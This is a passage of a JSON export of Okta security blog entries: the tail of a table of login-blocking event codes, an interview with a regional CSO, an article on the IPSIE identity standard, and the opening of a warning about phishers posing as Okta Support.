password\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"signup_pwd_leak\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"IP address blocked: excessive failed login or registration requests without a successful login\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"limit_mu\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"User account lockout: excessive failed login requests per time period from the same IP address\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"limit_sul\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"IP address blocked: excessive failed login attempts to a single user 
account\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"limit_wc\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2025-02-09T23:45:08.431Z","secAuthor":[{"id":"2d0612d0-ea24-5a48-bed3-797e6306eea4","bio":{"bio":""},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/1uHU5vrZGhUcNFNAzgylU2/e92b96b2d85e5fb3c5da8a2c1695ddc9/md_profile.png"},"name":"Moussa Diallo","jobTitle":"Sr Manager, Identity Threat Research","slug":"moussa-diallo","node_locale":"en"},{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"<p>Brett Winterford is Vice President of Okta Threat Intelligence. Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats. Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. <br> Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank.  
Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"}]},{"slug":"/articles/2025/01/cso-conversations-matt-immler","id":"bac68bc4-173f-5478-bc88-ec9b4cf26241","title":"CSO Conversations: Matt Immler, Regional CSO of Americas East","date":"2025-01-22T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"italic\"}],\"value\":\"CSO Conversations is a blog series interviewing Okta’s Regional CSOs supporting David Bradbury, Okta’s Chief Security Officer in providing the best service for our customers. Okta’s Regional CSOs are integral to Okta’s Security Trust and Culture team, building and strengthening trusted advisor relationships with global security thought leadership.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"What motivated your career pursuit in cybersecurity?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"I originally got my degree in Computer Science and went to work straight out of college at the US DoD. 
In that world, security is at the forefront of all projects and quickly became more interesting to me than the actual coding I was doing at the time.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"How has your previous experience shaped your approach to cybersecurity today?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"During my time in government, I worked on both offensive and defensive security teams. Having a chance to work on both sides of the aisle gave me a unique perspective from both the attacker and defender’s point of view. This allows me to look at a particular defensive technique and draw upon my own experience in the offensive role to determine if and how I could circumvent the control.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Are there any existing or emerging threats of particular interest to you?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Modern platforms are providing us with more and more capabilities, and along with that a wealth of settings with near limitless potential for misconfiguration. Many security issues I have encountered in the past have not necessarily been the result of the actual software or platform, but the way in which it is configured. 
I see the need for a balance in providing the greatest level of freedom to the user, while ensuring the appropriate guardrails are in place to balance risk.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"What trends are you seeing in cybersecurity relating to your region?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The cybersecurity conversation is expanding beyond what we would conventionally think of as part of that field. The overall resilience of the system is coming up more often in the security context of the conversation than in previous years. More focus is being given to the organization's ability to withstand, recover from, and adapt to security events, and not merely to prevent them from occurring in the first place.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"If you could provide a few short cybersecurity words of wisdom to Okta customers, what would they be?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Be sure to review and apply any published best practices. While core documentation will make sure you can get the job done, the best practice guides ensure that you’re using it the recommended way, which in Okta’s case, takes a security approach when determining those best practices. The identity landscape is evolving quickly with new capabilities entering the mainstream every year, but those changes take time and many older protocols or methods must necessarily be supported to bridge the gap for adoption. 
Just because an implementation works, doesn’t always mean it’s the most secure option available.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"What is the most significant change you’ve seen in the cybersecurity industry in your career to-date?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"I hate buzzwords, but this question is going to make me go down that road. I've avoided it until now, but we all know the answer: It starts with ‘A’ and ends with ‘I’ – it's new, its full capabilities are not well understood, and it poses unknown threats that are testing the efficacy of existing defenses and prompting swift development of new mitigation strategies. I think the bulk of upcoming security initiatives are going to be heavily influenced by the new things we learn every day about AI and what it could be capable of doing, and at the very least will be a frustrating new addition to threat models everywhere. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"From your perspective, what is the impact of cybersecurity awareness in today’s organizations?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Cybersecurity awareness is a critical function in any organization, but has long needed to evolve from simply sending a quarterly mock phishing email and routine annual training to something more comprehensive. Anyone who has ever worked in this field knows that the same 10% of employees are going to click that phishing email every time, and if your numbers are that low, you’re lucky. Intelligent threat actors are going to craft quality phishing emails, and it only takes one click to be successful. 
Okta has heavily invested in our security awareness program in order to make it more frequent, interesting, and engaging to our employees, e.g., incentivising the identification and reporting of even the most minor security concerns to help employees feel like they are part of the program and not just being lectured. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"How do you employ \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/blog/2024/04/the-story-behind-oktas-values/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"value\":\"Okta’s corporate values\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\" in your day to day?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Personally, in my role as a Regional CSO, I spend a lot of time with Okta’s customers, and am particularly fond of our “Love our Customers” value. Many companies are closed off when it comes to security, and there can be merit to this, because you never want to tip your hand or expose potential areas of weakness publicly before you’re ready. However, this does not mean security should be a black box. When there is information that should be made public, it is best to be loud and on the verge of oversharing. What good is releasing information to mitigate a vulnerability if you bury it deep in the release notes somewhere? When a security team is putting the time and effort into identifying risk and providing mitigations to customers, every effort should be made to be transparent. 
\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/oktane-on-the-road/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"value\":\"Oktane on the Road\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\" brings \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/oktane/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"value\":\"Oktane\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\" to those who couldn’t attend in Las Vegas, can you share some of your experiences?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Having done Oktane on the Road events in the past, I would say it brings tremendous value to our customers. Cost cutting and tight budgets are prevalent right now, and many times, the first thing to go is travel and conference money. The customers I have interacted with at these events are appreciative of the local engagement allowing them to hear about the latest and greatest from Okta and interact with Okta employees, while not having to break the bank on travel. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"In your opinion, what is the best part of your Regional CSO role?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-4\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Building relationships with our customers. I speak to our customers on a regular basis across the entire US. In my role, I am afforded the ability to have very transparent conversations on issues relevant to their security teams. 
Having this level of engagement with our customers throughout every industry lets me hear and understand the differences in the experiences and what threats each individual industry might be facing. Retail and Hospitality have different concerns than large banks and financial institutions, but I often find commonalities and am able to bring different perspectives to these conversations by being able to reference an experience or a solution from another industry that might not have been considered otherwise.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Matt Immler was recently featured at \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/oktane/2024/sessions/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Oktane24\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" in Lessons learned from the Okta frontlines in addition to a live news desk session on \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/secure-identity-commitment/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Okta’s Secure Identity Commitment (OSIC)\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\". Matt also participated in a \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/webinars/hub/fireside-chat--security-outcomes-powered-by-identity/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Fireside Chat\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" on Security Outcomes Powered by Identity. 
\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"document\"}"},"summary":{"summary":"CSO Conversations is a blog series interviewing Okta’s Regional CSOs supporting David Bradbury, Okta’s Chief Security Officer in providing the best service for our customers. Okta’s Regional CSOs are integral to Okta’s Security Trust and Culture team, building and strengthening trusted advisor relationships with global security thought leadership."},"updatedAt":"2025-01-23T21:41:44.376Z","secAuthor":[{"id":"c48d5ee4-19d0-5916-b1a9-0edf2a45f611","bio":{"bio":"<p>Matt Immler is the Regional Chief Security Officer for Okta in the Eastern Americas, where he leverages his Identity expertise to drive customer success. Matt’s background includes Auth0 Security and Compliance, in addition to previous roles in information security, network operations and software engineering. His educational achievements include a Bachelor of Computer Science from the University of Maryland Baltimore County and a Masters in Information Technology Management from the University of Maryland Global Campus. In his downtime, Matt enjoys volunteering at a local theatre company in support of his kids. 
</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/6Tv1MPNtUrsW9mrykUviAH/ff8a5a5bbeb663905cca908bcafcef25/matt_immler.jpg"},"name":"Matt Immler","jobTitle":"Regional Chief Security Officer","slug":"/hackers/matt-immler","node_locale":"en"}]},{"slug":"/articles/2025/01/raising-the-bar-for-the-industry-with-ipsie","id":"024c6441-82bd-51aa-bb54-5c9168ee7c31","title":"Raising the Bar for our Industry with IPSIE","date":"2025-01-15T10:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s vision of \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"building a world where anyone can safely use any technology,\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" powered by their Identity, continues to be our guiding factor. Today, almost 20,000 customers rely on Okta’s industry-leading Identity solutions worldwide in nearly every industry sector.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Early last year, Okta \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2024/02/introducing-the-okta-secure-identity-commitment/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"announced\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/secure-identity-commitment/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Secure Identity Commitment (OSIC)\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", a long-term pledge to lead the industry in the fight against Identity attacks. 
The Commitment consists of four pillars, including \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Raising the bar for our industry.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" We’re committed to making this a reality.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The rise in Identity-based attacks\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Based on Okta’s internal reporting, \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Okta detects and blocks over 3 billion attacks per month. \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"We protect over 800 million unique monthly users from cyber threats, ranging from credential stuffing to malicious bots. Enterprise anonymized data confirmed that over a 90-day period, we reduced credential stuffing attempts and malicious bot traffic by more than 90% for some of our largest customers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"From year to year, motivated threat actors employ new and innovative techniques in their ongoing efforts to gain unauthorized access. 
In a 2024 report in which Okta participated, Verizon concluded \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.verizon.com/business/resources/reports/dbir/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"68%\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of breaches involved a human element, and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.verizon.com/business/resources/reports/dbir/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"24%\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" involved the use of stolen credentials.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At Okta, we continue to live our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2024/04/the-story-behind-oktas-values/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"corporate values\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" by enforcing industry best practices; 100% of Okta employees use phishing-resistant authentication solutions like Okta FastPass with device assurance and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/products/adaptive-multi-factor-authentication/?utm_source=google&utm_campaign=amer_can_can_all_wf-all_dg-ao_a-wf_search_google_text_kw_nonbrand-priority_utm2&utm_medium=cpc&utm_id=aNK4z000000bmPNGAY&gad_source=1&gclid=Cj0KCQiAj9m7BhD1ARIsANsIIvA6Y4i7qKcCTEjS79AJaoH79abvvd0o6olBO0FW2jrNxZMTQ2FWX4MaArpCEALw_wcB\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Adaptive Multi-Factor Authentication (AMFA)\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". 
To learn more about MFA and phishing-resistant authentication, download our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/resources/whitepaper-the-secure-sign-in-trends-report/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Secure Sign-In Trends Report 2024.\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A new industry standard\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To set the stage and advance the tech sector, the OpenID Foundation (OIDF) recently announced the formation of a new \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/press-room/press-releases/okta-openid-foundation-tech-firms-tackle-todays-biggest-cybersecurity/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"working group\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" with support from Okta, Ping Identity, Microsoft, SGNL, Beyond Identity, and Capital One. The Interoperability Profiling for Secure Identity in the Enterprise, or IPSIE, is the name of the OpenID Foundation working group tasked with establishing this new Identity standard.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Last year’s \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/oktane/2024/sessions/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Oktane messaging\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" heavily focused on the theme of possibility. 
When introducing Okta’s commitment to IPSIE at Oktane24 in Las Vegas, Okta CEO and Co-Founder Todd McKinnon said, “The goal with IPSIE is to standardize identity security and help foster an open ecosystem where building and using enterprise applications that are secure by default is easy for everyone.” \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To support the integration of critical identity security capabilities in SaaS applications, the IPSIE working group intends to collaboratively focus on:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Single sign-on\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Lifecycle management\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Entitlements, such as Governance and Privileged Access\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Risk signal sharing\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Session termination\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Today, representatives from 25 unique companies are coming together each week to collaborate with meaningful discussion in pursuit of advancing this innovative industry standard. 
Open and available to all, the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/openid/ipsie/wiki\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"IPSIE working group\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" has the potential to transform enterprise SaaS security.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Joining forces and coming together\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Andrew Carnegie expressed his belief in collaboration as a powerful force for achieving greater success by famously stating, “Teamwork is the ability to work together toward a common vision. The ability to direct individual accomplishments toward organizational objectives. It is the fuel that allows common people to attain uncommon results.”\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"IPSIE aims at fostering a more open, consistent, flexible SaaS ecosystem by empowering organizations to adhere to a higher level of security, more seamlessly and efficiently integrating amongst tech stacks. It also increases visibility across the Identity threat surface to better help protect against cyber attacks. 
Okta is excited to support and participate in the working group because we believe that a unifying industry standard is the key to fostering an open ecosystem, where it’s both seamless and efficient to build and use enterprise apps that are secure by default.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We recently published integrations with 50 leading enterprise SaaS applications including Google, Microsoft Office 365, Slack and Salesforce that support modern identity best practices aimed at enhancing security and reducing operational burden. Each integration takes just seconds to set up and requires virtually no ongoing maintenance, giving enterprises instant access to capabilities for their most-used apps such as Universal Logout with the ability to immediately terminate user sessions when a threat is detected. These integrations best meet the tech landscape and customers where they are today, while better protecting systems and data going forward.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We’ll keep you posted\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As we continue to progress on the new IPSIE standard within the OpenID Foundation working group, take comfort in knowing we will continue to keep you updated. Okta is committed to working with third-party standards bodies, Identity providers and SaaS vendors to continue to get you more visibility of evolving threats. 
The working group aims to have the first set of draft specifications published in early 2025.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2024/11/help-reshape-identity-security-join-the-ipsie-working-group/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Join us\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in our fight against Identity-based attacks, and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://openid.net/announcing-ipsie-working-group/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"learn more\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" on how to get involved with the OpenID Foundation working group to tackle key Identity security challenges in today’s enterprise environments.\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"To set the stage and advance the tech sector, the OpenID Foundation (OIDF) recently announced the formation of a new working group with support from Okta, Ping Identity, Microsoft, SGNL, Beyond Identity, and Capital One. The Interoperability Profiling for Secure Identity in the Enterprise, or IPSIE, is the name of the OpenID Foundation working group tasked with establishing this new Identity standard."},"updatedAt":"2025-01-16T14:12:22.279Z","secAuthor":[{"id":"2f88c41e-3abf-5fcc-9a06-9ed78081f8e2","bio":{"bio":"<p>Carmen Girardin is a Manager, Security Communications at Okta. Backed by over a decade of experience in the fintech sector, Carmen is a proficient technical writer with domain expertise in Identity and Access Management (IAM). 
She is passionate about delivering engaging, timely customer communications on the cybersecurity ecosystem and the evolving threat landscape, to help our customers gain the most value from Okta. Carmen spends her downtime traveling, thrifting for treasures and reading.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/gBvc42utKRh6jJpgLjxrt/fb5e38cd4c6043a5e888850b4b2c2df4/IMG_8061.jpg"},"name":"Carmen Girardin","jobTitle":"Manager, Security Communications","slug":"/hackers/carmen-girardin","node_locale":"en"}]},{"slug":"/articles/2024/okta-social-engineering-report-response-and-recommendation","id":"b31bd80e-760c-5413-863f-f8252e8eae0d","title":"Okta Social Engineering Impersonation Report - Response and Recommendation","date":"2024-12-11T11:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Summary\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has identified an increase in phishing social engineering attempts claiming to be from Okta Support. This report provides guidance on what you can expect when getting technical assistance from Okta Support, or contact from Okta. 
If you receive suspicious contact claiming to be Okta, please promptly inform Okta Security at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"mailto:security@okta.com\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"security@okta.com\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What can you expect?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the event a support case is open, Okta Support may contact you by phone or email. The Okta Support call will include an initial validation process for authorized representatives by both phone and email. \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Okta Support will not ask for your password or for an MFA token.\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the case of a significant security-related concern, Okta customers will receive a rapid communication alert. Rapid alerts will only be received by your organization’s security & privacy contact(s) and primary IT contact(s) via the information in their respective profiles, which must be up-to-date to successfully communicate with you.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta may contact you from the following verified channels:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1. 
